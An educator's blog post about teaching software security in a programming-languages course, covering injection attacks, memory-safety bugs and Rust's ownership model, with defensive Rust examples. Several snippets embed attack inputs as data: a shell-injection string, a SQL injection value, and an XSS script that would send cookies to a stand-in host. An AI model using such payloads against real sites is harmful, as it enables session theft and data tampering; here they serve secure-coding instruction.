Software Security Is a Programming Languages Issue

This is the last of three posts on the course I regularly teach, CS 330, Organization of Programming Languages. The first two posts covered programming language styles and mathematical concepts. This post covers the last quarter of the course, which focuses on software security and, related to that, the programming language Rust.

This course topic might strike you as odd: Why teach security in a programming languages course? Doesn’t it belong in, well, a security course? I believe that if we are to solve our security problems, then we must build software with security in mind right from the start. To do that, all programmers need to know something about security, not just a handful of specialists. Security vulnerabilities are both enabled and prevented by various language (mis)features and programming (anti)patterns. As such, it makes sense to introduce these concepts in a programming (languages) course, especially one that all students must take.

This post is broken into three parts: the need for security-minded programming, how we cover this topic in 330, and our presentation of Rust. The post turned out to be a bit longer than I’d anticipated; apologies!


Security is a programming (languages) concern

The Status Quo: Too Much Post-hoc Security

There is a lot of interest these days in securing computer systems. This interest follows from the highly publicized roll call of serious data breaches, denial of service attacks, and system hijacks. In response, security companies are proliferating, selling computerized forms of spies, firewalls, and guard towers. There is also a regular call for more “cybersecurity professionals” to help man the digital walls.

It might be that these efforts are worth their collective cost, but call me skeptical. I believe that a disproportionate portion of our efforts focuses on adding security to a system after it has been built. Is your server vulnerable to attack? If so, no problem: Prop an intrusion detection system in front of it to identify and neuter network packets attempting to exploit the vulnerability. There’s no doubt that such an approach is appealing; too bad it doesn’t actually work. As computer security experts have been saying since at least the 60s, if you want a system to actually be secure then it must be designed and built with security in mind. Waiting until the system is deployed is too late.

Building Security In

There is a mounting body of work that supports building secure systems from the outset. For example, the Building Security In Maturity Model (BSIMM) catalogues the processes followed by a growing list of companies to build more secure systems. Companies such as Synopsys and Veracode offer code analysis products that look for security flaws. Processes such as Microsoft’s Security Development Lifecycle and books such as Gary McGraw’s Software Security: Building Security In, and Sami Saydjari’s recently released Engineering Trustworthy Systems identify a path toward better designed and built systems.

These are good efforts. Nevertheless, we need even more emphasis on the “build security in” mentality so that we can rely far less on necessary, but imperfect, post-hoc measures. For this shift to happen, we need better education.

Security in a Programming Class

[Image: Choosing performance over security]

Programming courses typically focus on how to use particular languages to solve problems efficiently. Functionality is obviously paramount, with performance an important secondary concern.

But in today’s climate, shouldn’t security be at the same level of importance as performance? If you argue that security is not important for every application, I would say the same is true of performance. Indeed, the rise of slow, easy-to-use scripting languages is a testament to that. But sometimes performance is very important, or becomes so later, and the same is true of security: many security bugs arise because code originally written for a benign setting ends up in a security-sensitive one. As such, I believe educators should regularly talk about how to make code more secure, just as we regularly talk about how to make it more efficient.

To do this requires a change in mindset. A reasonable approach, when focusing on correctness and efficiency, is to aim for code that works under expected conditions. But expected use is not good enough for security: Code must be secure under all operating conditions.

Normal users are not going to feed weirdly formatted files to PDF viewers. But adversaries will. As such, students need to understand how a bug in a program can be turned into a security vulnerability, and how to stop that from happening. Our two lectures on security in CS 330 cycle among illustrating a kind of security vulnerability, identifying the conditions that make that vulnerability possible, and developing a defense that eliminates those conditions. For the defenses we focus on language properties (e.g., type safety) and programming patterns (e.g., validating input).

Security Bugs

In our first lecture, we start by introducing the high-level idea of a buffer overflow vulnerability, in which an input is larger than the buffer designed to hold it. We hint at how to exploit it by smashing the stack. A key feature of this attack is that while the program intends for an input to be treated as data, the attacker is able to trick the program into treating it as code that does something harmful. We also look at command injection, and see how it similarly manifests when an attacker tricks the program into treating data as code.
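To make the data-as-code idea concrete, here is a small Rust sketch (my own illustration, not course code; it assumes a Unix-style shell is available, and the injected command is deliberately harmless). Splicing untrusted input into a shell command string lets the shell parse the attacker’s data as code, while passing the same input as a plain argument keeps it inert.

```rust
use std::process::Command;

fn main() {
    // Pretend this came from an attacker: the ';' ends the intended command
    // and starts a new one (kept harmless here on purpose).
    let user_input = "photo.png; echo pwned";

    // VULNERABLE: the input becomes part of a shell command string,
    // so the shell interprets the attacker's data as code.
    let _risky = Command::new("sh")
        .arg("-c")
        .arg(format!("ls -l {}", user_input))
        .status();

    // SAFER: the input is passed as a single argument to the program itself;
    // no shell ever parses it, so it remains data.
    let _safe = Command::new("ls")
        .arg("-l")
        .arg(user_input)
        .status();
}
```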

[Image: SQL injection: malicious code from benign parts]

Our second lecture covers vulnerabilities and attacks specific to web applications, including SQL injection, cross-site request forgery (CSRF), and cross-site scripting (XSS). Once again, these vulnerabilities all have the attribute that untrusted data provided by an attacker can be cleverly crafted to trick a vulnerable application into treating that data as code. This code can be used to hijack the program, steal secrets, or corrupt important information.
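As a concrete illustration of data becoming code on the web, here is a hypothetical page-building snippet, sketched in Rust rather than the Ruby of our course project. Splicing an attacker-supplied “comment” directly into a page means every visitor’s browser runs the attacker’s script.

```rust
fn main() {
    // An attacker submits this as a "comment" on a vulnerable page.
    let comment = "<script>sendCookiesTo('https://evil.example')</script>";

    // VULNERABLE: the comment is spliced into the page verbatim, so the
    // browser treats the attacker's data as code (stored cross-site
    // scripting); escaping or sanitizing it first would keep it inert.
    let page = format!(
        "<html><body><p>Latest comment: {}</p></body></html>",
        comment
    );
    println!("{}", page);
}
```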

Coding Defenses

It turns out the defense against many of these vulnerabilities is the same, at a high level: validate any untrusted input before using it, to make sure it’s benign. For a buffer overflow, that means checking that an input is no larger than the buffer allocated to hold it, so the buffer is not overrun. In any language other than C or C++, this check happens automatically (and is generally needed to ensure type safety).
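Here is what that automatic check looks like, using Rust as a stand-in for a type-safe language (an illustrative sketch, not course code): an out-of-range index causes a runtime panic instead of silently reaching past the buffer, and the get method lets the program validate the index explicitly and reject bad input.

```rust
fn main() {
    let buffer = [0u8; 8];
    let untrusted_index: usize = 42; // pretend this came from an attacker

    // In C, buffer[untrusted_index] would silently access memory past the
    // end of the array. Here the access is checked at runtime:
    // let byte = buffer[untrusted_index]; // panics: index out of bounds

    // Explicit validation: `get` returns None for an out-of-range index,
    // so the program can reject the input gracefully.
    match buffer.get(untrusted_index) {
        Some(byte) => println!("byte = {}", byte),
        None => eprintln!("rejecting input: index {} is out of range", untrusted_index),
    }
}
```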

For the other four attacks, the vulnerable application uses the attacker’s input when piecing together another program. For example, an application might expect user inputs to correspond to a username and password, splicing these inputs into a template SQL query with which it consults a database. But the inputs could contain SQL commands that cause the query to do something different than intended. The same is true when constructing shell commands (command injection) or JavaScript and HTML programs (cross-site scripting). The defense is also the same, at a high level: user inputs need either to have potentially dangerous content removed or to be made inert by construction (e.g., through the use of prepared statements).
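To make the contrast concrete, here is a sketch in Rust using the rusqlite crate (my choice for this example; the course project is in Ruby, and the exact API details here are my assumptions). The first query is assembled by string interpolation, so the attacker’s input rewrites its logic; the prepared statement passes the same input as plain data that the database never parses as SQL.

```rust
use rusqlite::{params, Connection, Result};

fn main() -> Result<()> {
    // A throwaway in-memory database with one stored credential.
    let conn = Connection::open_in_memory()?;
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)", params![])?;
    conn.execute(
        "INSERT INTO users (name, password) VALUES (?1, ?2)",
        params!["alice", "s3cret"],
    )?;

    // Attacker-supplied "password" crafted to rewrite the query's logic.
    let name = "alice";
    let password = "' OR '1'='1";

    // VULNERABLE: splicing inputs into the SQL text lets the attacker's
    // data become part of the query program. This query would match even
    // though the password is wrong.
    let _vulnerable_sql = format!(
        "SELECT COUNT(*) FROM users WHERE name = '{}' AND password = '{}'",
        name, password
    );

    // SAFER: a prepared statement keeps the inputs as data; the database
    // never interprets them as SQL, so the login is correctly rejected.
    let count: i64 = conn.query_row(
        "SELECT COUNT(*) FROM users WHERE name = ?1 AND password = ?2",
        params![name, password],
        |row| row.get(0),
    )?;
    println!("login {}", if count > 0 { "accepted" } else { "rejected" });
    Ok(())
}
```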

None of this stuff is new, of course. Most security courses talk about these topics. What is unusual is that we are talking about them in a “normal” programming languages course.

Our security project reflects the defensive-minded orientation of the material. While security courses tend to focus on vulnerability exploitation, CS 330 focuses on fixing the bugs that make an application vulnerable. We do this by giving the students a web application, written in Ruby, with several vulnerabilities in it. Students must fix the vulnerabilities without breaking the core functionality. Our auto-grading system checks both: several hidden test cases exploit the initially present vulnerabilities, and students must modify the application so that these cases pass (meaning each vulnerability has been removed and/or can no longer be exploited) without causing any of the functionality-based test cases to fail.

Low-level Control, Safely

The most dangerous kind of vulnerability allows an attacker to gain arbitrary code execution (ACE): through exploitation, the attacker is able to execute code of their choice on the target system. Memory management errors in type-unsafe languages (C and C++) comprise a large class of ACE vulnerabilities; use-after-free errors, double frees, and buffer overflows are all examples. Buffer overflows are still the single largest category of vulnerability today, according to MITRE’s Common Weakness Enumeration (CWE) database.

Programs written in type-safe languages, such as Java or Ruby, are immune to these sorts of memory errors. Writing applications in these languages would thus eliminate a large category of vulnerabilities straightaway. The problem is that type-safe languages typically rely on abstract data representations and garbage collection (GC), which make programming easier but remove low-level control and add overhead that is sometimes hard to bear. C and C++ are essentially the only game in town for operating systems, device drivers, and embedded devices (e.g., IoT), which cannot tolerate the overhead and/or the lack of control. And we see that these systems are regularly, and increasingly, under attack. What are we to do?

Rust: Type safety without GC

In 2010, the Mozilla Corporation (which brings you Firefox) officially began an ambitious project to develop a safe language suitable for writing high-performance programs. The result is Rust. In Rust, type safety ensures (with various caveats) that a program is free of memory errors and free of data races, and Rust achieves type safety without garbage collection, which is not true of any other mainstream language.

[Image: Rust, the programming language]

In CS 330, we introduce Rust and its basic constructs, showing how Rust is arguably closer to a functional programming language than it is to C/C++. (Rust’s use of curly braces and semi-colons might make it seem familiar to C/C++ programmers, but there’s a whole lot more that’s different than is the same!)
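For a taste of what I mean, here is a small illustrative sketch (not course code): algebraic data types, exhaustive pattern matching, expression-oriented functions, and iterator pipelines with closures all feel closer to a functional language than to C.

```rust
// An enum is an algebraic data type, much like a variant type in a
// functional language.
enum Shape {
    Circle { radius: f64 },
    Rect { width: f64, height: f64 },
}

// `match` is exhaustive pattern matching, and the function body is a single
// expression whose value is returned, as in a functional language.
fn area(s: &Shape) -> f64 {
    match s {
        Shape::Circle { radius } => std::f64::consts::PI * radius * radius,
        Shape::Rect { width, height } => width * height,
    }
}

fn main() {
    let shapes = vec![
        Shape::Circle { radius: 1.0 },
        Shape::Rect { width: 2.0, height: 3.0 },
    ];
    // Iterator pipelines with closures take the place of explicit loops.
    let total: f64 = shapes.iter().map(area).sum();
    println!("total area = {}", total);
}
```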

We spend much of our time talking about Rust’s use of ownership and lifetimes. Ownership (aka linear typing) is used to carefully track pointer aliasing, so that memory modified via one alias cannot mistakenly corrupt an invariant assumed by another. Lifetimes track the scope in which pointed-to memory is live, so that it is freed automatically, but no sooner than is safe. These features support managing memory without GC. They also support sophisticated programming patterns via smart pointers and traits (a construct I was unfamiliar with, but now really like). We provide a simple programming project to familiarize students with the basic and advanced features of Rust.
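Here is a minimal sketch of those rules in action (my own illustration; the commented-out lines are the ones the compiler rejects):

```rust
fn main() {
    // Ownership: a String has exactly one owner; assignment moves it.
    let s = String::from("hello");
    let t = s;              // ownership moves from `s` to `t`
    // println!("{}", s);   // rejected: `s` was moved, so this alias is stale
    println!("{}", t);

    // Borrowing: many shared (&) borrows or one mutable (&mut) borrow,
    // never both at once, so one alias cannot silently invalidate another.
    let mut v = vec![1, 2, 3];
    let first = &v[0];      // shared borrow of the vector's contents
    // v.push(4);           // rejected here: would mutate while `first` is borrowed
    println!("first = {}", first);
    v.push(4);              // fine now: the borrow `first` has ended

    // Lifetimes: memory is freed when its owner goes out of scope, and no
    // reference may outlive the data it points to. A function like this
    // would be rejected, since `local` is freed when the function returns:
    //
    //     fn broken() -> &'static str {
    //         let local = String::from("freed too soon");
    //         &local   // rejected: `local` does not live long enough
    //     }
}
```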

Assessment

I enjoyed learning Rust in preparation for teaching it. I had been wanting to learn it since my interview with Aaron Turon some years back. The Rust documentation is first-rate, so that really helped.

I also enjoyed seeing connections to my own prior research on the Cyclone programming language. (I recently reflected on Cyclone, and briefly connected it to Rust, in a talk at the ISSISP’18 summer school.) Rust’s ownership relates to Cyclone’s unique/affine pointers, and Rust’s lifetimes relate to Cyclone’s regions. Rust’s smart pointers match patterns we also implemented in Cyclone, e.g., for reference counted pointers. Rust has taken these ideas much further, e.g., a really cool integration with traits handles tricky aspects of polymorphism. The Rust compiler’s error messages are also really impressive!

A big challenge in Cyclone was finding a way to program with unique pointers without tearing your hair out. My impression is that Rust programmers face the same challenge (unless they resort to frequent use of unsafe blocks). Nevertheless, Rust is a much-loved programming language, so the language designers are clearly doing something right! Oftentimes facility is a matter of comfort, and comfort is a matter of education and experience. As such, I think Rust fits into the philosophy of CS 330, which aims to introduce new language concepts that are interesting in and of themselves, and may yet have expanded future relevance.

Conclusions

We must build software with security in mind from the start. Educating all future programmers about security is an important step toward instilling that mindset. In CS 330 we illustrate common vulnerability classes and how they can be defended against through language choice (e.g., using a type-safe language like Rust) and programming patterns (e.g., validating untrusted input). By doing so, we hope to make our students more fully cognizant of the task that awaits them in their future software development jobs. We might also interest them in learning more about security in a subsequent security class.

In writing this post, I realize we could do more to illustrate how type abstraction can help with security. For example, abstract types can be used to increase assurance that input data is properly validated, as explained by Google’s Christoph Kern in his 2017 SecDev keynote. This is also a consequence of semantic type safety, as argued well by Derek Dreyer in his POPL’18 keynote. Good stuff to do for Spring ’19!
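To sketch Kern’s idea in Rust terms (with names of my own invention): a type whose only public constructor performs validation turns “has this input been escaped?” into a question the type checker answers.

```rust
mod validated {
    /// A string that is safe to splice into an HTML page. The field is
    /// private, so outside this module the only way to obtain a SafeHtml
    /// is `from_untrusted`, which escapes the input. The type checker then
    /// guarantees that every SafeHtml value went through that validation.
    pub struct SafeHtml(String);

    impl SafeHtml {
        pub fn from_untrusted(input: &str) -> SafeHtml {
            SafeHtml(
                input
                    .replace('&', "&amp;")
                    .replace('<', "&lt;")
                    .replace('>', "&gt;"),
            )
        }

        pub fn as_str(&self) -> &str {
            &self.0
        }
    }
}

// A sink that accepts only SafeHtml cannot be handed raw user input by
// mistake: passing an unvalidated string is a type error.
fn render_comment(comment: &validated::SafeHtml) -> String {
    format!("<p>{}</p>", comment.as_str())
}

fn main() {
    let untrusted = "<script>stealCookies()</script>";
    println!("{}", render_comment(&validated::SafeHtml::from_untrusted(untrusted)));
    // render_comment(&untrusted); // rejected: expected &SafeHtml, found &&str
}
```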


